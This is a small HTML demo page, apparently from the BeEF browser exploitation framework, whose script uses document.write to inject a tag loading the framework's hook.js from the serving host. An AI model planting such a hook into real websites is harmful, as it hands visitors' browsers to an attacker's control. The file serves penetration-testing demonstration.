Files
beef/extensions/demos/html/plain.html
2012-04-23 17:36:25 +09:30

6 lines
199 B
HTML

<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>